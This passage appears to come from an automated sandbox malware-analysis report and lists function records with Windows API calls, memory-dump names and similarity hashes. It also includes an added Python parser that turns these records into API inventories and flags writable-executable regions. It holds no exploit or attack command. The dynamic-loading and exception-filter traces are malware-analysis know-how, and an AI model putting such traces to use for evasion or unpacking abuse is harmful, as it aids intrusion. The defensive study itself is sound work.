  • Part of subcall function 00418404: _memmove.LIBCMT ref: 00418502
  • Part of subcall function 00418404: GetWindowDC.USER32(00000000), ref: 0041850C
  • Part of subcall function 00418404: CreateDIBitmap.GDI32(00000000,00000000,00000004,?,00000000,00000000), ref: 00418524
  • Part of subcall function 00418404: ReleaseDC.USER32 ref: 0041854F
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Resource$_memmove$BitmapCreateFindH_prolog3_LoadLockReleaseSizeofWindow
• String ID:
• API String ID: 494462844-0
• Opcode ID: f6747669bfee5da85a366a45766eac3db6e4d47719d1d7b92c91e0582118db7a
• Instruction ID: e0c5efddd6b4ef5b005f5174a80a1990ea1978f55c594150333c46b7d507938a
• Opcode Fuzzy Hash: f6747669bfee5da85a366a45766eac3db6e4d47719d1d7b92c91e0582118db7a
• Instruction Fuzzy Hash: F7E0C036101218BF8F512F65EC4CC9B3F6EEB892A17014069F90D86122DA369891DBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,HsG,00443FB0,?,00000001), ref: 0044A9F3
• UnhandledExceptionFilter.KERNEL32(?), ref: 0044A9FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ExceptionFilterUnhandled
• String ID: HsG
• API String ID: 3192549508-1835203436
• Opcode ID: efe467880f15d172d13d48c7834ea5daa1aa95f23f53234417b2f6d97d77ad49
• Instruction ID: 2d8b31a25deea2f2380808392b572cba4f53bf1497d61823b305e945473b5d55
• Opcode Fuzzy Hash: efe467880f15d172d13d48c7834ea5daa1aa95f23f53234417b2f6d97d77ad49
• Instruction Fuzzy Hash: 5DB09231144608ABCB803B96EC09B483F2AEB04752F0140A0FA0D44072CB6258908A9A
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocaleInfoW.KERNEL32(?,00001004,?,00000014), ref: 0043FCBB
• TranslateCharsetInfo.GDI32(00000000,?,00000002), ref: 0043FCD6
• IsValidLocale.KERNEL32(?,00000001), ref: 0043FCEE
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: InfoLocale$CharsetTranslateValid
• String ID:
• API String ID: 1865635962-0
• Opcode ID: 8a826de0a7a4e57be8ecc05db1e7b23e13d85c8a2f564318947abef584fd7cf1
• Instruction ID: 348cc59ed7b2327183995af3e406bbc7d54b55fdff87066bb2c5d927c77e1cdc
• Opcode Fuzzy Hash: 8a826de0a7a4e57be8ecc05db1e7b23e13d85c8a2f564318947abef584fd7cf1
• Instruction Fuzzy Hash: E8018030E00209AADB10DFB4AC49AAE77B8EB08B10F405136ED06D6290D774E9498B58
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: D@H
• API String ID: 0-11303593
• Opcode ID: c6908bc7e076f53624255c92aeb998977db4e1ff9d21a4eb9a10f36351c1e2e3
• Instruction ID: 40f5e8f0d4d8c497b09300f8172240c06565cb039067412e4ec3e4d9ff932a27
• Opcode Fuzzy Hash: c6908bc7e076f53624255c92aeb998977db4e1ff9d21a4eb9a10f36351c1e2e3
• Instruction Fuzzy Hash: 05527DB1E012159FDB04CF59C4806AEBBB1BF88304F2581AED815BB381D779EE52CB95
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (kH$@$hkH
                                                                                                                                                                          • API String ID: 0-1980855728
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: GetProcAddress$LoadLibraryExA$aryExA
• API String ID: 0-2920269711
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0043871A
• GetSystemTimeAsFileTime.KERNEL32(?,00000044,004386E6,?,?,00000005,0000086E,00000000, This setup was created with an EVALUATION VERSION of %s. Evaluation setups work for only %s hours after they were built. Please r,?,00000001,00000038,00437683,?,?,?), ref: 0043873C
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Time$FileH_prolog3_System
• String ID:
• API String ID: 477554553-0
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: PAH
• API String ID: 0-43532356
Uniqueness
Uniqueness Score: -1.00%

APIs
• EncodePointer.KERNEL32(Function_000455CB), ref: 00445617
Memory Dump Source
• Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: EncodePointer
• String ID:
• API String ID: 2118026453-0
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: PAH
• API String ID: 0-43532356
Uniqueness
Uniqueness Score: -1.00%

APIs
• CoCreateInstance.OLE32(0047D5E8,00000000,00000001,00483FA0,?), ref: 00431AD6
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 542301482-0
                                                                                                                                                                          • Opcode ID: 91ff789573837ecc24c67c9f7845786368b1126711f4d671552e16f6b99d2095
                                                                                                                                                                          • Instruction ID: 7dfdfb4c759cd9440f614d9787b893f5b3cd75d8ef2a8cd258633d15be3e31af
                                                                                                                                                                          • Opcode Fuzzy Hash: 91ff789573837ecc24c67c9f7845786368b1126711f4d671552e16f6b99d2095
                                                                                                                                                                          • Instruction Fuzzy Hash: 61F02E71301222A7C3209B49DCC0D47FBA8EF4CB617104227FA089B310D7709C50C7E8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001004,?,00000014,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 0043FD30
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                          • Opcode ID: 402103fe908f4fdbba871a76e6678005101bd62eaab9a6c50635c7b463e13cc6
                                                                                                                                                                          • Instruction ID: 4a94abd8e86c2b4b318adf9820102e80f85daa6e6f91d90a2124096070cdd8a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 402103fe908f4fdbba871a76e6678005101bd62eaab9a6c50635c7b463e13cc6
                                                                                                                                                                          • Instruction Fuzzy Hash: 39F0A731A00108ABDB00EFB4CD459ED73FCEB0C714F50803AE511D7150DB30D9048758
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00458F69
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Version
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                          • Opcode ID: 2948fcc731edb99d37c8c611bf9d3f5f819ef15e55cdcba535fe9e1d3eb5734e
                                                                                                                                                                          • Instruction ID: cf5d3cca8dad4fec357086e6e0e50f175719d895170d044e452b7b5c95b5203a
                                                                                                                                                                          • Opcode Fuzzy Hash: 2948fcc731edb99d37c8c611bf9d3f5f819ef15e55cdcba535fe9e1d3eb5734e
                                                                                                                                                                          • Instruction Fuzzy Hash: ADF03731A1010C9FDFA4EB6489462DAB3F56B09309F5000FED546E2152DD389A8D8A59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0044A9D1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                          • Opcode ID: 203f1529596fdfb764c6a66e1c8501b5dbf6caaefccfe0b893ae7569693f62d0
                                                                                                                                                                          • Instruction ID: 4a1aa9b2ca55304aad44dc55aeab8f23e1abc3f89e5570b7a6db83f96d71bc94
                                                                                                                                                                          • Opcode Fuzzy Hash: 203f1529596fdfb764c6a66e1c8501b5dbf6caaefccfe0b893ae7569693f62d0
                                                                                                                                                                          • Instruction Fuzzy Hash: EDA0113000020CAB8A003B8AEC08888BF2EEA002A0B0080A0F80C000328B33A8A08A8A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%
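The entries above are the report's per-function records: each one lists the Win32 APIs the function calls with their reference addresses, the memory dump the function was recovered from, and the Opcode/Instruction IDs and fuzzy hashes the report uses for similarity matching. Triaging a few hundred of these by hand is slow, so here is an added example (written for this page, not part of the report or of Joe Sandbox's own tooling) that parses blocks in this layout into records, builds an API inventory, collapses duplicate function bodies by Opcode ID, and decodes the dump file names. One assumption, marked in the code, is not stated anywhere on the page: that a dump name is laid out as `<proc>.<seq>.<id>.<base>.<protect>.<type>.sdmp`, so that the fifth field is the Win32 page-protection constant of the dumped region. Under that assumption the field value `00000080` on the `0x401000` and `0x448000` regions decodes to `PAGE_EXECUTE_WRITECOPY`, a region that is both executable and writable, which is the thing a practitioner wants flagged when the code being analysed lives there. The sample text is constructed from two of the entries above with the leading whitespace removed.

```python
"""Parse Joe Sandbox-style per-function report blocks into records (added example).

ASSUMPTION (not documented on the page): a dump file name is
<proc>.<seq>.<id>.<base>.<protect>.<type>.sdmp, with the fifth field being the
Win32 page-protection constant of the dumped region.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: two entries copied from the report, leading whitespace removed.
SAMPLE = """\
APIs
• GetVersionExW.KERNEL32(?), ref: 00458F69
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: 2948fcc731edb99d37c8c611bf9d3f5f819ef15e55cdcba535fe9e1d3eb5734e
• Instruction Fuzzy Hash: ADF03731A1010C9FDFA4EB6489462DAB3F56B09309F5000FED546E2152DD389A8D8A59
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0044A9D1
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ExceptionFilterUnhandled
• Opcode ID: 203f1529596fdfb764c6a66e1c8501b5dbf6caaefccfe0b893ae7569693f62d0
Uniqueness

Uniqueness Score: -1.00%
"""

API_RE = re.compile(r"^• (?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$")
SOURCE_RE = re.compile(r"^• Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
FIELD_RE = re.compile(r"^• (?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # (api, module, args, ref address)
    source_file: str = ""
    offset: str = ""
    based_on_pe: bool = False
    associated: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)    # Opcode ID, fuzzy hashes, API ID, ...
    uniqueness: str = ""


def parse_report(text):
    """Split the text into entries; each entry ends at its 'Uniqueness Score' line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if cur is None:
            cur = FunctionRecord()
        if line.startswith("Uniqueness Score:"):
            cur.uniqueness = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = None
            continue
        if m := API_RE.match(line):
            cur.apis.append((m["api"], m["module"], m["args"], m["ref"].upper()))
        elif m := SOURCE_RE.match(line):
            cur.source_file, cur.offset = m["file"], m["off"]
            cur.based_on_pe = m["pe"] == "true"
        elif m := FIELD_RE.match(line):
            # "Download File" is link text left over from the HTML report, not data.
            val = m["val"].removesuffix("Download File").strip()
            if m["key"] == "Associated":
                cur.associated.append(val)
            else:
                cur.fields[m["key"]] = val
    if cur is not None and (cur.apis or cur.fields):
        records.append(cur)  # trailing entry with no score line
    return records


# Documented Win32 page-protection constants.
PAGE_FLAGS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_PROTECT = {0x10, 0x20, 0x40, 0x80}
WRITE_PROTECT = {0x04, 0x08, 0x40, 0x80}


def decode_dump_name(name):
    """Return (base address, protection, label) under the field-layout ASSUMPTION above."""
    parts = name.split(".")
    base = int(parts[3], 16)
    protect = int(parts[4], 16) & 0xFF  # drop modifiers such as PAGE_GUARD
    return base, protect, PAGE_FLAGS.get(protect, f"0x{protect:02x}")


def writable_code_regions(records):
    """Dump regions that are both executable and writable, each reported once."""
    seen, hits = set(), []
    for r in records:
        for name in [r.source_file, *r.associated]:
            if not name or name in seen:
                continue
            seen.add(name)
            base, protect, label = decode_dump_name(name)
            if protect in EXEC_PROTECT and protect in WRITE_PROTECT:
                hits.append((f"0x{base:08X}", label))
    return hits


def unique_opcode_ids(records):
    """Collapse duplicate function bodies; Opcode ID is the report's body hash."""
    return {r.fields["Opcode ID"] for r in records if "Opcode ID" in r.fields}


def api_inventory(records):
    """Sorted (module, api, ref address) triples, one per distinct call site."""
    return sorted({(mod, api, ref) for r in records for api, mod, _, ref in r.apis})


if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for mod, api, ref in api_inventory(recs):
        print(f"{mod}!{api} @ {ref}")
    for base, label in writable_code_regions(recs):
        print(f"writable+executable dump region at {base}: {label}")
```

Feed the whole function section of a report through `parse_report` and the API inventory becomes a starting point for a static import-style view of an unpacked sample, while `unique_opcode_ids` gives the number of distinct function bodies rather than the number of table rows. The protection decoding is only as good as the file-name assumption; confirm it against one dump's actual page protection before relying on it.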

Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: X@H
• API String ID: 0-361767101
• Opcode ID: ffc877130de1722e3482dd5ac53eb8a52df6f34dc72517322caef677b8aabef9
• Instruction ID: 8770b8da711c05f89826dbd8b4c1a4cb7cd16b6c2ead6c70de41dc9569c1382d
• Opcode Fuzzy Hash: ffc877130de1722e3482dd5ac53eb8a52df6f34dc72517322caef677b8aabef9
• Instruction Fuzzy Hash: 42618DB2E052158BCB18CF59C8402AEFBB1FF89314F2481BED818AB781C7759E41CB85
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9bed2fed0cb238441295c0b8acffe133f4c4c7283e70248d0d1c85d9cc5e9836
• Instruction ID: 32c081486d45988937e31a5408c3f29f25550d82316aa6c43ba750c0ce5d5043
• Opcode Fuzzy Hash: 9bed2fed0cb238441295c0b8acffe133f4c4c7283e70248d0d1c85d9cc5e9836
• Instruction Fuzzy Hash: 6C7196316205528FE718EF1DFCD16793352E7C5311B898A3DDB0187396C639EA21C794
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b8a7c98a0782e6b5e21f603e02649a41459cd2475fc6240637aa34996f55e17d
                                                                                                                                                                          • Instruction ID: 720c58e1dad0af949beb7db1d980cc4aff5a885d51f04726ef07140645160bf4
                                                                                                                                                                          • Opcode Fuzzy Hash: b8a7c98a0782e6b5e21f603e02649a41459cd2475fc6240637aa34996f55e17d
                                                                                                                                                                          • Instruction Fuzzy Hash: A6419536700A44DFEB15CE98C9D0769B7A6FB8EB74F34007AE906D7712D6BAAC00D644
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0f655bcf1c95378901d987d1d9b469e9a501cc10800333927b741c41f6420aaf
                                                                                                                                                                          • Instruction ID: 6fe91e2dd532c9ce6e0cf6ec768b83116016aaa074b7fee4a38832fc39333276
                                                                                                                                                                          • Opcode Fuzzy Hash: 0f655bcf1c95378901d987d1d9b469e9a501cc10800333927b741c41f6420aaf
                                                                                                                                                                          • Instruction Fuzzy Hash: A741643A700A44DFEB16CE94C9D1B6577A6FB8EB64F34407AE90397712D6BAAC00D640
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
